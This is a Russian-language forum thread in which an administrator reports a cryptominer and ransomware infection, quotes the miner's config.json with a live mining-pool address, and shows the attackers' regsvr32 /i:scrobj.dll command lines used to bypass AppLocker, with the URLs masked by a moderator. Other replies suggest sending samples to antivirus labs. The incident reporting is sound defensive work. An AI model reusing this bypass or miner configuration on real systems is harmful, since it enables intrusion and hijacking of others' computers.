NuLLsoft 0 Опубликовано 21 января, 2019 Share Опубликовано 21 января, 2019 Здравствуйте. Выловил пару файликов качающих майнер. Создана задача в планировщике, действие: "...\AppData\Roaming\amd64_microsoft-windows-etw-rundown_31bf3856ad364e35_10.0.17134.1_none_dc4ffe912cae63fe\dfscli.exe" - этот файлик не сохранил, был удалён антивирусом, ещё в папке лежат два файла pcaui-1.3.exe и config.json. Содержимое config.json: { "cpu-priority": 0,"max-cpu-usage": 100,"bfactor": 12,"bsleep": 25,"pools": [{"url": "stratum+tcp://185.127.24.232:77","user": "QUILHUIL","pass": "x","keepalive": true,}],} Если нужен pcaui-1.3.exe - напишите куда залить. Качал майнер на удалённый рабочий стол, пофиксил, проблем не доставил. А вот второй зловред нашифровал дел. Но не всё так плохо, файлы юзеров какие живы, какие нет - не очень принципиально. Попали под замес базы 1С, которые были открыты - выжили, а которые закрыты - зашифрованы. Но были архивы на диске D, с доступом только определённых админов, можно сказать повезло, потеряли не очень много. Как работал зловред: в планировщике скачивал и обновлял хром, запускал его с заданием и ломился в инет на удалённый комп за файлами, скачивал и запускал шифрование. В карантине кое что осталось, если нужно, залью, пишите куда. Обошли AppLocker: CmdLine:C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe /u /s /i:******scrobj.dll CmdLine:C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe C:\Windows\system32\regsvr32.exe /u /s /i:********crobj.dll Защитник windows подавал сигналы, но пользователи не обратили внимание. Сообщение от модератора Mark D/ Pearlstone Вредоносные ссылки удалены. Цитата Ссылка на сообщение Поделиться на другие сайты
Friend 1 246 Опубликовано 22 января, 2019 Share Опубликовано 22 января, 2019 @NuLLsoft, загрузите все в вирустотал и направьте вирусные лаборатории для детектирования, например, newvirus@kaspersky.com, Цитата Ссылка на сообщение Поделиться на другие сайты
TactoVotTac 0 Опубликовано 22 января, 2019 Share Опубликовано 22 января, 2019 Файлы от amd? очень даже подозрительно... Цитата Ссылка на сообщение Поделиться на другие сайты
Peter15 19 Опубликовано 7 марта, 2019 Share Опубликовано 7 марта, 2019 А должен ли антивирус Касперского детектить майнеры по сигнатурам? Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.